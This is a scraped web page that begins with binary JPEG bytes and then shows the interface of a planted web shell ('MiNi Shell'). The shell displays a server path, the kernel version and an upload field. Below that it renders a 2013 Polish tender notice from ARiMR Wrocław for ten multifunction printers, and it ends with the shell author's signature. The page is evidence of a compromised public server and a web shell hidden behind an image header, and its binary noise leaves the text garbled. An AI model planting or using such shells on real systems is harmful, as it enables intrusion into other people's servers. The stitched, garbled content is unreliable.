JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131024/434746-N-2013.html

<p class="kh_header"><b>Wrocław: Dostawa 10 szt. urządzeń wielofunkcyjnych na potrzeby Biur Powiatowych Dolnośląskiego Oddziału Regionalnego ARiMR we Wrocławiu</b><br>
<b>Numer ogłoszenia: 434746 - 2013; data zamieszczenia: 24.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, woj. dolnośląskie, tel. 71 3697400, faks 71 3643702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa 10 szt. urządzeń wielofunkcyjnych na potrzeby Biur Powiatowych Dolnośląskiego Oddziału Regionalnego ARiMR we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 10 sztuk urządzeń wielofunkcyjnych na potrzeby Dolnośląskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa oraz podległych Biur Powiatowych.
Dostawa obejmuje dostarczenie, a także wniesienie urządzeń wielofunkcyjnych do wskazanych przez upoważnionych przedstawicieli Zamawiającego pomieszczeń oraz ich zainstalowanie i uruchomienie.
Parametry techniczne wymagane przez Zamawiającego dla urządzeń wielofunkcyjnych będących przedmiotem niniejszego zamówienia określa poniższa tabela:
Parametry techniczne urządzeń będących przedmiotem postępowania. 
a)	Specyfikacja modułu kopiarki:
Specyfikacja moduł kopiarki	Parametr wymagany
Kopiowanie w skali szarości	Wymagany
Kopiowanie wielokrotne	Nie mniej niż 1-999
Rodzaj systemu kopiowania	Laserowy elektrostatyczny 
Prędkość druku-kopiowania format A4 (mono) jednostronnie 	Nie mniej niż 25 stron na minutę
Prędkość druku-kopiowania format A3(mono) jednostronnie	Nie mniej niż 15 stron na minutę
Prędkość druku-kopiowania format A4 (mono) duplex	Nie mniej niż 25 stron na minutę
Prędkość druku-kopiowania format A3(mono) duplex	Nie mniej niż 15 stron na minutę
Czas oczekiwania na pierwszą stronę druku-kopiowania skala szarości	Nie więcej niż 6 sekund
Czas nagrzewania urządzenia	Nie więcej niż 45 sekund
Format oryginałów	Nie mniej niż A5 - A3
Rozdzielczość kopiowania	Nie mniej niż 600 x 600 dpi
Skalowanie 	Nie mniej niż 25 - 400 % (z krokiem maksimum co 1%) oraz zdefiniowane skalowanie 
Funkcje kopiowania 	Wymagane:
- Wydruk testowy 
- Znaki Wodne
Dupleks	Wymagany automatyczny format nie mniej niż A5-A3
b)	Specyfikacja modułu drukarki:
Specyfikacja moduł drukarki	Parametr wymagany
Druk w skali szarości	Wymagany
Druk z sieci	Wymagany
Rozdzielczość druku	Nie mniej niż 600 x 600 dpi
Język opisu strony	Wymagany: PCL 6 i PostScript L3
Wpierane systemy operacyjne	Wymagany:
- Windows XP SP3,
- Windows Server 2000-2003 ,
- Windows Server 2008 (32-64bit) ,
- Windows 7 (32-64)
Karta sieciowa	Wymagany Ethernet 1000BaseT
Pamięć RAM urządzenia	Nie mniej niż 2 GB
Dysk urządzenia HDD	Nie mniej niż 150 GB
Obsługiwane protokoły 	Wymagany: IPv4-IPv6, TCP-IP
Maksymalne obciążenie miesięczne	Nie mniej niż 25 000 wydruków na miesiąc  dla 5 % pokrycia format A4
Dupleks	Wymagany, automatyczny format nie mniej niż A5-A3
c)	Specyfikacja obsługi papieru:
Specyfikacja obsługi papieru	Parametr wymagany
Liczba podajników z papierem	Nie mniej niż 2 kasety oraz podajnik ręczny format A5-A3
Pojemność pojemnika	Nie mniej niż 500 arkuszy (80g-m2)
Pojemność Podajnika ręcznego	Nie mniej niż 150 arkuszy (80g-m2)
Pojemność podajnika oryginałów (ADF) 	Nie mniej niż 100 arkuszy (80g-m2)  format A5-A3
Pojemność odbiornika 	Nie mniej niż 250 arkuszy (80g-m2)
Obsługiwana gramatura papieru 	Nie mniej niż 64-210 g-m2
d)	Specyfikacja modułu skanera:
Specyfikacja modułu skanera	Parametr wymagany
Skanowanie w kolorze i skali szarości	Wymagane 
Prędkość skanera 	Nie mniej niż 50 stron na minutę w kolorze i skali szarości 
Rozdzielczość skanera	Nie mniej niż 600 x 600 dpi
Formaty skanowane	Nie mniej niż A5-A3
Dupleks	Wymagany automatyczny format nie mniej niż A5-A3
Tryb skanowania	Wymagany:
- Skanowanie sieciowe TWAIN
- Skan do Email (z uwierzytelnianiem dla protokołu SMTP), 
- Skanowanie na adres e-mail użytkownika uwierzytelnionego na urządzeniu (bez potrzeby ręcznego wprowadzania)
-  Możliwość ograniczenia wysyłania skanowanych dokumentów tylko do wskazanej przez zamawiającego domeny
- Skanowanie do skrzynki (na wbudowany w urządzenie dysk HDD)
- Skanowanie do zdefiniowanego zasobu sieciowego SMB  
Format plików	PDF, JPG, TIFF, OCR -  do dokumentu edytowalnego w pakiecie MS Office (dostępny z panelu urządzenia bez limitu użytkowników - wymagane rozpoznawanie polskich znaków)
e)	Specyfikacja interfejsu urządzenia:
Specyfikacja interfejsu urządzenia	Parametr wymagany
Obsługa urządzenia	Wielofunkcyjny ekran dotykowy urządzenia, 
Przeglądarka WWW, Oprogramowanie dedykowane do zarządzania
Ekran urządzenia	Wymagany: dotykowy, wielofunkcyjny, kolorowy
Język interfejsu 	Wymagany: Polski
Funkcje Ekranu	Wymagany: Możliwość definiowania indywidualnych widoków dla użytkowników
Klawisze funkcyjne	Wymagane (typu start, reset, stop, itp.)
f)	Specyfikacja pozostałych parametrów:

Specyfikacja pozostałych  parametrów	Parametr wymagany
Zasilanie 		Wymagane 220-240 V
Waga	Nie więcej niż 100 Kg
Wymiary (szer. x gł. x wys.) bez podstawy	Nie więcej niż (1mx1mx1m) 
Posadowienie	Podstawa na kołach z schowkiem na papier
Uchwyty 	Wymagane 4 sztuki do przenoszenia urządzenia
	
Specyfikacja zabezpieczeń	Parametr wymagany
Dostęp do urządzenia	Autoryzacja Kartami zbliżeniowymi oraz Microsoft Active Directory (AD)
Rodzaj Autoryzacji	Karty zbliżeniowe MIFARE
Konta użytkowników 	Wymagana obsługa Microsoft Active Directory (AD)
Liczba obsługiwanych kont	Nie mniej niż 500
Definiowanie funkcji dostępnych dla użytkownika	Wymagane
Bezpieczeństwo:	Wymagane:
- Wydruk poufny
- Autoryzacja użytkownika
- Zapis autoryzacji
- Wydruk poufny
- Nadpisywanie dysku twardego
- Szyfrowanie dysku twardego 
- Automatyczne czyszczenie danych i pamięci
- Odbiór poufny faksów (tylko maszyny gdzie są faksy)
- Szyfrowanie danych drukujących użytkowników
- Obsługa protokołów komunikacyjnych SSL2, SSL3, IPSec
g)	Serwis:
Serwis 	Parametr wymagany
Czasy reakcji serwisu - kwalifikacje personelu	- 1h na potwierdzenie otrzymania zgłoszenia (email na wskazane adresy klienta) ewentualnie ustalenie czasu wizyty.
- 8h na przyjazd serwisu do  roboczych do każdej z wskazanych lokalizacji.
- Wykonawca powinien dysponować co najmniej 3 pracownikami serwisu w siedzibie-oddziale obsługującym teren Woj. Dolnośląskiego, posiadającymi uprawnienia do obsługi oferowanych przez oferenta modeli urządzeń, wydane przez producenta tych urządzeń
- Wykonawca powinien dysponować co najmniej 2 pracownikami posiadającymi certyfikat wydany przez producenta sprzętu-oprogramowania potwierdzający odbycie szkoleń  z instalacji i administracji oferowanego rozwiązania
Zautomatyzowane przesyłanie informacji do Serwisu o stanie urządzeń	- stany liczników, zacięcia, błędy, stan materiałów eksploatacyjnych (oferent zapewni zamawiającemu pełną kontrolę wysyłanych informacji).
- Dostęp dla zamawiającego do systemu przez klienta opartego na przeglądarce WWW.
- Podgląd danych o stanie urządzeń formie interaktywnej mapy z naniesionymi na nią urządzeniami
Dostawa urządzeń będzie obejmować 10 lokalizacji. Adresy dostawy zostaną wskazane wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza. Poniżej wykaz potencjalnych lokalizacji dostawy wymaganego sprzętu:
Wykaz adresowy obiektów Dolnośląskiego Oddziału Regionalnego ARiMR
Lp.	Lokalizacja	Adres
1	Dolnośląski Oddział Regionalny ARiMR we Wrocławiu	52-438 Wrocław, ul. Giełdowa 8
2	Biuro Powiatowe ARiMR 
w Bolesławcu 	59-700 Bolesławiec, ul. Komuny Paryskiej 38
3	Biuro Powiatowe ARiMR 
w Dzierżoniowie 	58-300 Dzierżoniów, ul. Batalionów Chłopskich 19
4	Biuro Powiatowe ARiMR 
w Głogowie 	67-200 Głogów, ul. Sikorskiego 40
5	Biuro Powiatowe ARiMR 
w Górze 	56-200 Góra,  ul. Armii Polskiej 8
6	Biuro Powiatowe ARiMR 
w Jaworze 	59-400 Jawor, ul. Starojaworska 91
7	Biuro Powiatowe ARiMR 
w Jeleniej Górze 	58-506 Jelenia Góra, ul. Gustawa Morcinka 33a
8	Biuro Powiatowe ARiMR 
w Kamiennej Górze 	58-400 Kamienna Góra, ul. Sienkiewicza 6a
9	Biuro Powiatowe ARiMR 
w Kłodzku 	57-300 Kłodzko, ul. Harcerzy 6
10	Biuro Powiatowe ARiMR 
w Legnicy	59 - 220 Legnica, ul. Bydgoska 18
11	Biuro Powiatowe ARiMR 
w Lubaniu	58 - 800 Lubań Śl., ul. Karola Miarki 1
12	Biuro Powiatowe ARiMR w Lubinie 
z-s w Rudnej	59 - 305 Rudna, ul. Ścinawska 19
13	Biuro Powiatowe ARiMR w Lwówku Śl. 
z-s w Uboczu	59 - 620 Gryfów Śl., Ubocze 300
14	Biuro Powiatowe ARiMR w Miliczu 
z-s w Sławoszowicach	56 - 300 Sławoszowice, ul. Kolejowa 28
15	Biuro Powiatowe ARiMR w Oleśnicy 
z-s w Sycowie	56 - 500 Syców ul. Ogrodowa 10
16	Biuro Powiatowe ARiMR 
w Oławie	55-200 Oława, ul. Nowodojazdowa 9
17	Biuro Powiatowe ARiMR 
w Polkowicach	59 - 100 Polkowice, ul. Spółdzielcza 2
18	Biuro Powiatowe ARiMR 
w Strzelinie	57 - 100 Strzelin, ul. Kamienna 10
19	Biuro Powiatowe ARiMR 
w Środzie Śl.	55 - 300 Środa Śl., ul. Wawrzyńca Korwina 2
20	Biuro Powiatowe ARiMR 
w Świdnicy	58 - 100 Świdnica, ul. Saperów 25 b
21	Biuro Powiatowe ARiMR 
w Trzebnicy	55 - 100 Trzebnica, ul. Milicka 23
22	Biuro Powiatowe ARiMR 
w Wałbrzychu	58 - 300 Wałbrzych, ul. Uczniowska 21
23	Biuro Powiatowe ARiMR 
w Wołowie	56 - 100 Wołów, ul. Zaułek Zielony 20
24	Biuro Powiatowe ARiMR 
we Wrocławiu	50 - 452 Wrocław, ul. Komuny Paryskiej 72 
25	Biuro Powiatowe ARiMR 
w Ząbkowicach Śl.	57 - 200 Ząbkowice Śl., ul. Staszica 18
26	Biuro Powiatowe ARiMR 
w Zgorzelcu	59 - 900 Zgorzelec, ul. Boh. II Armii Wojska Polskiego 8
27	Biuro Powiatowe ARiMR w Złotoryi
z-s w Pielgrzymce	59 - 524 Złotoryja, Pielgrzymka 109 A
Do wykonawcy należeć będzie również przeszkolenie min. dwóch pracowników z zakresu obsługi urządzeń i drobnych napraw, np. zakleszczenie papieru.
Każde urządzenie musi być wyposażone w 2 tonery (o maksymalnej wydajności przewidzianej do oferowanego typu urządzeń), tak by było gotowe do pracy. 
Zamawiający wymaga aby wykonawca zaoferował urządzenia jednego modelu pochodzące od jednego producenta.
Zamawiający wymaga, aby dostarczone urządzenia współpracowały z otwartymi systemami zarządzania drukiem oferującym obsługę rozliczeń, zabezpieczenia oraz kontrolę dostępu w urządzeniach wielofunkcyjnych, ułatwiając kontrolę kosztów wydruków, jednocześnie zapewniając bezpieczeństwo poufnych dokumentów, np. systemów SafeQ firmy YSoft czy Q-vision firmy Qube lub równoważne
Na wykonawcy spoczywa obowiązek udowodnienia, że zaoferowane rozwiązania spełniają wymagania Zamawiającego.
Ponadto Zamawiający informuje, że złożona oferta musi całkowicie spełniać wymagania Zamawiającego pod rygorem odrzucenia oferty.
Zamawiający wymaga, aby wykonanie przedmiotu zamówienia zastąpiło na warunkach i zasadach określonych we wzorze umowy wraz z załącznikami, stanowiącym załącznik do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 15.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące posiadania wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, dotyczące sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach: a)działania siły wyższej lub wystąpienia stanu wyższej konieczności, b)zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe, c)zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia, d)jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego, e)zmianie elementów zamówienia na elementy lepsze lub odpowiedniejsze korzystnych dla Zamawiającego, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa, Dolnośląski Oddział Regionalny, 52-438 Wrocław, ul. Giełdowa 8, sekretariat - I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2013 godzina 10:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa, Dolnośląski Oddział Regionalny, 52-438 Wrocław, ul. Giełdowa 8, sekretariat - I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com